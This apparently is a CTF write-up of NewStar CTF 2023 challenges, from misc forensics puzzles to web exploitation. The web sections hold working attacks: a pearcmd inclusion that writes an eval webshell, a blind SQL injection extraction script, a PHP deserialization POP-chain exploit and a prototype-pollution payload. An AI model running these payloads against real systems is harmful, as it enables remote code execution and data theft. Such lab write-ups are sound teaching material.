Contents
I. 阳光开朗大男孩 (Sunny Cheerful Guy)
II. 大怨种 (Big Sucker)
III. 2-分析 (2-Analysis)
IV. 键盘侠 (Keyboard Warrior)
V. 滴滴滴 (Beep Beep Beep)
VI. Include?
VII. medium_sql
VIII. POP Gadget
IX. OtenkiGirl
I. 阳光开朗大男孩 (Sunny Cheerful Guy)
1. The challenge provides two files, secret.txt and flag.txt. secret.txt contains:
法治自由公正爱国公正敬业法治和谐平等友善敬业法治富强公正民主法治和谐法治和谐法治法治公正友善敬业法治文明公正自由平等诚信平等公正敬业法治和谐平等友善敬业法治和谐和谐富强和谐富强和谐富强平等友善敬业公正爱国和谐自由法治文明公正自由平等友善敬业法治富强和谐自由法治和谐法治和谐法治和谐法治法治和谐富强法治文明公正自由公正自由公正自由公正自由
Decoding it as a Core Socialist Values cipher at http://www.atoolbox.net/Tool.php?Id=850 gives:
this_password_is_s000_h4rd_p4sssw0rdddd
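The same decoding done offline, as an added example (not from the original writeup): each two-character value is one hex digit, 诚信 and 友善 act as escapes for the digits a-f, and the hex string is the UTF-8 plaintext. The escape rule (诚信 + n = 10 + n, 友善 + n = 6 + n) is inferred from the tool's output and verified against the challenge's secret.txt.

```python
# Added example: offline decoder/encoder for the "core socialist values" cipher.
VALUES = ["富强", "民主", "文明", "和谐", "自由", "平等",
          "公正", "法治", "爱国", "敬业", "诚信", "友善"]
INDEX = {v: i for i, v in enumerate(VALUES)}

# secret.txt from the challenge, normalised to simplified characters
SECRET = ("法治自由公正爱国公正敬业法治和谐平等友善敬业法治富强公正民主法治和谐法治和谐"
          "法治法治公正友善敬业法治文明公正自由平等诚信平等公正敬业法治和谐平等友善敬业"
          "法治和谐和谐富强和谐富强和谐富强平等友善敬业公正爱国和谐自由法治文明公正自由"
          "平等友善敬业法治富强和谐自由法治和谐法治和谐法治和谐法治法治和谐富强法治文明"
          "公正自由公正自由公正自由公正自由")

def decode_core_values(cipher: str) -> str:
    """Map value tokens back to hex digits and decode the UTF-8 bytes."""
    cipher = "".join(cipher.split())  # tolerate line breaks in the file
    tokens = iter(cipher[i:i + 2] for i in range(0, len(cipher), 2))
    digits = []
    for tok in tokens:
        if tok not in INDEX:
            raise ValueError(f"not a core-value token: {tok!r}")
        n = INDEX[tok]
        if n == 10:          # 诚信: next value carries digit - 10 (a..d)
            n = 10 + INDEX[next(tokens)]
        elif n == 11:        # 友善: next value carries digit - 6 (e..f, also a..d)
            n = 6 + INDEX[next(tokens)]
        if not 0 <= n <= 15:
            raise ValueError("escape sequence does not form a hex digit")
        digits.append(f"{n:x}")
    return bytes.fromhex("".join(digits)).decode("utf-8")

def encode_core_values(plain: str) -> str:
    """Inverse of decode_core_values. The online tool chooses one of the two
    escape forms at random for a-f; this encoder always uses 诚信 for a-d
    and 友善 for e-f, which decode_core_values accepts either way."""
    out = []
    for digit in plain.encode("utf-8").hex():
        n = int(digit, 16)
        if n < 10:
            out.append(VALUES[n])
        elif n < 14:
            out.append(VALUES[10] + VALUES[n - 10])
        else:
            out.append(VALUES[11] + VALUES[n - 6])
    return "".join(out)

if __name__ == "__main__":
    print(decode_core_values(SECRET))  # this_password_is_s000_h4rd_p4sssw0rdddd
```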
This is the key; together with the emoji in flag.txt, it suggests that flag.txt was encrypted with emoji-AES.
Decrypting with emoji-AES at https://aghorler.github.io/emoji-aes/ using the key s000_h4rd_p4sssw0rdddd yields the flag.
II. 大怨种 (Big Sucker)
1. The challenge provides a GIF. Write a script to extract every frame of the GIF:
from PIL import Image
import os

def extract_frames(gif_path, output_dir):
    gif = Image.open(gif_path)
    os.makedirs(output_dir, exist_ok=True)
    try:
        while True:
            current_frame = gif.tell()
            output_path = os.path.join(output_dir, f"frame_{current_frame}.png")
            gif.save(output_path, "PNG")
            gif.seek(current_frame + 1)  # raises EOFError after the last frame
    except EOFError:
        pass
    print("Extraction complete!")

gif_path = "1.gif"
output_dir = "./res/"
extract_frames(gif_path, output_dir)
One of the frames is a Han Xin code (汉信码). It can be scanned online at https://tuzim.net/hxdecode/ to obtain the flag.
III. 2-分析 (2-Analysis)
1. According to the challenge description, the flag consists of three pieces of information: the login username, the name of the vulnerable file, and the name of the WebShell file that was written.
Login requests are normally sent with POST, so first filter out all POST requests:
http && http.request.method == POST
There is a POST request to /api/action/login.php that carries username and password fields, from which the login username is best_admin.
2. Next are the vulnerable file name and the WebShell name. There is a lot of directory-scanning traffic, so first use a Wireshark filter to drop responses with status code 404:
http && http.response.code != 404
Analysing the remaining traffic, the response in frame 1267 looks odd: there is clearly a WebShell, so follow that stream.
This yields the remaining two pieces of information: the page parameter of index.php has an arbitrary file inclusion vulnerability, and the attacker used it to include pearcmd.php and write a WebShell named wh1t3g0d.php to the server.
而后續(xù)的流量也可以看到攻擊者是利用wh1t3g0d.php這個Shell執(zhí)行了一些系統(tǒng)命令:
?
由此得到Flag明文:best_admin_index.php_wh1t3g0d.php
整體md5后包裹flag{}得到最終flag:flag{4069afd7089f7363198d899385ad688b}
IV. 键盘侠 (Keyboard Warrior)
1. Opening the capture shows USB traffic; given the challenge name, it is presumably keyboard traffic. Use a Wireshark filter to isolate the keyboard traffic, then export it as res.pcapng:
usb.src =="1.15.1"
Use tshark to extract the capture data and strip the empty lines:
tshark -r res.pcapng -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt
導(dǎo)出后使用以下腳本進(jìn)行按鍵信息提取:
# HID usage id -> character, unshifted and with Shift held
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

nums = []
keys = open('usbdata.txt')
for line in keys:
    # Each usb.capdata line is one 8-byte keyboard report as 16 hex characters;
    # newer tshark versions separate the bytes with ':', so strip those first.
    line = line.strip().replace(':', '')
    if len(line) != 16:
        continue
    nums.append(line[0:2] + line[4:6])  # modifier byte + first key code
keys.close()

output = ""
for n in nums:
    if n[2:4] == "00":
        continue  # key-release report
    if n[2:4] in normalKeys:
        if n[0:2] == "02":  # left Shift held
            output += shiftKeys[n[2:4]]
        else:
            output += normalKeys[n[2:4]]
    else:
        output += '[unknown]'
print('output :\n' + output)
The result is:
nw3lc0m3<SPACE>to<SPACE>newstar<SPACE>ctf<SPACE>2023<SPACE>flag<SPACE>is<SPACE>here<SPACE>vvvvbaaaasffjjwwwwrrissgggjjaaasdddduuwwwwwwwwiiihhddddddgggjjjjjaa1112333888888<ESC><ESC>2hhxgbffffbbbnnat<CAP><CAP>ff<DEL>lll<DEL><DEL>aaa<DEL><DEL>gggg<DEL><DEL><DEL>{999<DEL><DEL>999<DEL><DEL>11<DEL>9aaa<DEL><DEL><SPACE><SPACE><DEL><DEL>eb2---<DEL><DEL>a450---<DEL><DEL>2f5f<SPACE><SPACE><SPACE><DEL><DEL><DEL>--<DEL>7bfc[unknown][unknown][unknown]-8989<DEL><DEL>dfdf<DEL><DEL>4bfa4bfa<DEL><DEL><DEL><DEL>85848584}}}<DEL><DEL><DEL><DEL><DEL><DEL><DEL>}]<SPACE><SPACE><SPACE><SPACE>nice<SPACE>work!1yyoou<SPACE>ggot<SPACE>tthhis<SPACE>fllag
<DEL> means delete and <SPACE> means space; applying the deletions in key order to the data gives the flag:
flag{9919aeb2-a450-2f5f-7bfc-89df4bfa8584}
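Replaying the reports so that Backspace actually deletes the previous character (and Caps Lock is honoured) removes the manual clean-up step above. This is an added example, not the original writeup's script; the capdata lines in SAMPLE are constructed, and the key table only covers letters, digits and the punctuation that appears in this flag.

```python
# Added example: replay tshark `usb.capdata` lines into the final typed text.
import string

# HID usage id -> (unshifted glyph, shifted glyph)
KEYMAP = {0x04 + i: (c, c.upper()) for i, c in enumerate(string.ascii_lowercase)}
KEYMAP.update({0x1e + i: ds for i, ds in enumerate(zip("1234567890", "!@#$%^&*()"))})
KEYMAP.update({0x2c: (" ", " "), 0x2d: ("-", "_"), 0x2e: ("=", "+"),
               0x2f: ("[", "{"), 0x30: ("]", "}")})
ENTER, BACKSPACE, CAPS_LOCK = 0x28, 0x2a, 0x39
SHIFT_MASK = 0x22  # modifier byte: left Shift (0x02) | right Shift (0x20)

def replay_keystrokes(capdata_lines):
    """Turn 8-byte boot-protocol keyboard reports into the text the user ended up with."""
    buf, caps = [], False
    for line in capdata_lines:
        raw = line.strip().replace(":", "")  # newer tshark separates bytes with ':'
        if len(raw) != 16:
            continue  # not a keyboard report
        report = bytes.fromhex(raw)
        modifiers, key = report[0], report[2]  # byte 1 is reserved, bytes 2..7 are keys
        if key == 0:
            continue  # key-release report, nothing typed
        if key == BACKSPACE:
            if buf:
                buf.pop()
        elif key == CAPS_LOCK:
            caps = not caps
        elif key == ENTER:
            buf.append("\n")
        elif key in KEYMAP:
            lower, upper = KEYMAP[key]
            shifted = bool(modifiers & SHIFT_MASK)
            if lower.isalpha():
                shifted ^= caps  # Caps Lock only inverts letters
            buf.append(upper if shifted else lower)
        # anything else (F-keys, Esc, arrows, ...) is ignored
    return "".join(buf)

# Constructed sample: "fkag" typed, "kag" backspaced, then "lag{9919-a450}"
# with Shift held for the braces (left Shift for '{', right Shift for '}').
SAMPLE = [
    "0000090000000000", "00000e0000000000", "0000040000000000", "00000a0000000000",
    "0000000000000000", "00002a0000000000", "00002a0000000000", "00002a0000000000",
    "00000f0000000000", "0000040000000000", "00000a0000000000", "02002f0000000000",
    "0000260000000000", "0000260000000000", "00001e0000000000", "0000260000000000",
    "00002d0000000000", "0000040000000000", "0000210000000000", "0000220000000000",
    "0000270000000000", "2000300000000000",
]

if __name__ == "__main__":
    print(replay_keystrokes(SAMPLE))  # flag{9919-a450}
```

Feeding it the lines of usbdata.txt instead of SAMPLE reproduces the flag above without editing the output by hand.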
V. 滴滴滴 (Beep Beep Beep)
1. The challenge provides a wav file and a jpg file. The wav sounds like dial tones, so use the dtmf2num tool to recognise the DTMF digits.
The dialled digits are:
52563319066
Combined with the hint in the challenge description, this number is probably a password used somewhere, so try steghide to extract hidden content from the jpg.
This produces a txt file that contains the flag.
VI. Include?
1. The page source is as follows.
<?php
error_reporting(0);
if(isset($_GET['file'])) {
    $file = $_GET['file'];
    if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
        die('hacker!');
    }
    include($file.".php");
    # Something in phpinfo.php!
}else {
    highlight_file(__FILE__);
}
?>
The challenge filters the common pseudo-protocols and log files and hints "Something in phpinfo.php!", so first visit phpinfo.php with the payload:
?file=phpinfo
Searching for flag in it turns up fake{Check_register_argc_argv}.
Searching for register_argc_argv shows that it is on.
Combining the title hint (pear), the fake flag and register_argc_argv being on, the intended route is to include pearcmd to achieve RCE.
payload:
?+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=@eval($_REQUEST[8]);?>+/tmp/cmd.php
然后訪問包含一句話木馬的cmd.php文件,執(zhí)行遠(yuǎn)程命令。
?file=/tmp/cmd&8=system("ls+/");
?file=/tmp/cmd&8=system("cat+/flag");
VII. medium_sql
1. The challenge is SQL injection; the usual tests show that it is boolean-based blind injection.
?id=TMP0919' And if(1>0,1,0) --+
?id=TMP0919' And if(0>1,1,0) --+
Sending the first payload returns content while the second does not, so the page shows two different (true/false) results depending on the if condition: boolean-based blind injection.
2. Write a blind-injection script that uses binary search.
import requests
import time

def condition(res):
    # The true branch renders a page containing 'Physics'
    if 'Physics' in res.text:
        return True
    return False

result = ''
_url = 'xxxxx'
for _time in range(1, 1000):
    print("time:%d" % _time)
    left = 32
    right = 128
    while right > left:
        mid = (left + right) // 2
        # Table names of the current database
        # url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(table_name))fRom(infOrmation_schema.tables)whEre((tAble_schema) In (dAtabase()))) fRom {_time} FOr 1))))In({mid})),1,0)%23"
        # Column names
        # url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(column_name))fRom(infOrmation_schema.columns)whEre((tAble_name) In ('here_is_flag'))) fRom {_time} FOr 1))))In({mid})),1,0)%23"
        # Column value
        url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(flag)fRom(here_is_flag)) fRom {_time} FOr 1))))In({mid})),1,0)%23"
        # Avoid sending requests too quickly
        time.sleep(0.2)
        res = requests.get(url=url)
        if condition(res):
            result += chr(mid)
            print(result)
            break
        else:
            # Table names of the current database
            # url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(table_name))fRom(infOrmation_schema.tables)whEre((tAble_schema) In (dAtabase()))) fRom {_time} FOr 1))))>({mid})),1,0)%23"
            # Column names
            # url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(column_name))fRom(infOrmation_schema.columns)whEre((tAble_name) In ('here_is_flag'))) fRom {_time} FOr 1))))>({mid})),1,0)%23"
            # Column value
            url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(flag)fRom(here_is_flag)) fRom {_time} FOr 1))))>({mid})),1,0)%23"
            res = requests.get(url=url)
            if condition(res):
                left = mid
            else:
                right = mid
    else:
        # No character matched in 32..127: substr() returned '' (Ord 0), so the string has ended
        break
VIII. POP Gadget
1. The source code is as follows.
<?php
highlight_file(__FILE__);
class Begin{
    public $name;
    public function __destruct(){
        if(preg_match("/[a-zA-Z0-9]/",$this->name)){
            echo "Hello";
        }else{
            echo "Welcome to NewStarCTF 2023!";
        }
    }
}
class Then{
    private $func;
    public function __toString(){
        ($this->func)();
        return "Good Job!";
    }
}
class Handle{
    protected $obj;
    public function __call($func, $vars){
        $this->obj->end();
    }
}
class Super{
    protected $obj;
    public function __invoke(){
        $this->obj->getStr();
    }
    public function end(){
        die("==GAME OVER==");
    }
}
class CTF{
    public $handle;
    public function end(){
        unset($this->handle->log);
    }
}
class WhiteGod{
    public $func;
    public $var;
    public function __unset($var){
        ($this->func)($this->var);
    }
}
@unserialize($_POST['pop']);
2. The challenge is about constructing a POP chain, and the chain is fairly simple. Starting from Begin's __destruct destructor, the chain is built to reach WhiteGod's __unset method, which contains a dynamic function call and therefore gives RCE.
The POP gadget chain:
Begin::__destruct -> Then::__toString -> Super::__invoke -> Handle::__call -> CTF::end -> WhiteGod::__unset
The exploit:
<?php
class Begin {
    public $name;
    public function __construct($a) {
        $this->name = $a;
    }
}
class Then {
    private $func;
    public function __construct($a) {
        $this->func = $a;
    }
}
class Handle {
    protected $obj;
    public function __construct($a) {
        $this->obj = $a;
    }
}
class Super {
    protected $obj;
    public function __construct($a) {
        $this->obj = $a;
    }
}
class CTF {
    public $handle;
    public function __construct($a) {
        $this->handle = $a;
    }
}
class WhiteGod {
    public $func;
    public $var;
    public function __construct($a, $b) {
        $this->func = $a;
        $this->var = $b;
    }
}
// POP Gadget:
// Begin::__destruct -> Then::__toString -> Super::__invoke -> Handle::__call -> CTF::end -> WhiteGod::__unset
// preg_match() on Begin::$name (a Then object) triggers __toString, which calls
// $func (a Super object) and so __invoke; Super calls an undefined method on
// Handle (__call), Handle calls CTF::end, and unset() of a missing property on
// WhiteGod reaches __unset, where readfile("/flag") is invoked.
$obj = new Begin(new Then(new Super(new Handle(new CTF(new WhiteGod("readfile", "/flag"))))));
echo urlencode(serialize($obj));
Note that some classes have protected or private members (whose serialized names contain NUL bytes), so the serialized data must be URL-encoded, giving:
O%3A5%3A%22Begin%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Then%22%3A1%3A%7Bs%3A10%3A%22%00Then%00func%22%3BO%3A5%3A%22Super%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00obj%22%3BO%3A6%3A%22Handle%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00obj%22%3BO%3A3%3A%22CTF%22%3A1%3A%7Bs%3A6%3A%22handle%22%3BO%3A8%3A%22WhiteGod%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A8%3A%22readfile%22%3Bs%3A3%3A%22var%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7D%7D%7D%7D
IX. OtenkiGirl
1. Submit some arbitrary data; capturing the requests, or simply reading the attached source, reveals the following two request endpoints:
First: fetch all entries (changing the 0 to another value fetches the entries after that timestamp)
Second: submit an entry
The submission must be JSON, and the contact and reason fields are mandatory, for example:
POST /submit HTTP/1.1
Content-Type: application/json

{"contact": "test", "reason": "test"}
Look at the routes/info.js source, specifically getInfo, the function that fetches data from the database. Its lines 4 and 5 filter the timestamp we pass in so that the returned data is no earlier than min_public_time from the configuration. Checking config.js and config.default.js in the project root shows that config.js does not set min_public_time, so line 5 of getInfo simply falls back to DEFAULT_CONFIG.min_public_time. If prototype pollution can set min_public_time to a date of our choosing, the earliest-time restriction is bypassed and data from any time can be retrieved.
Looking at the routes/submit.js source reveals the injection point: line 7 of the merge function is vulnerable to prototype pollution, so we only need to inject a value for data['__proto__']['min_public_time'].
The payload is therefore:
POST /submit HTTP/1.1
Content-Type: application/json

{"contact": "test", "reason": "test", "__proto__": {"min_public_time": "1001-01-01"}}
然后為我們再請求/info/0
,就能得到更多的數(shù)據(jù),得到flag。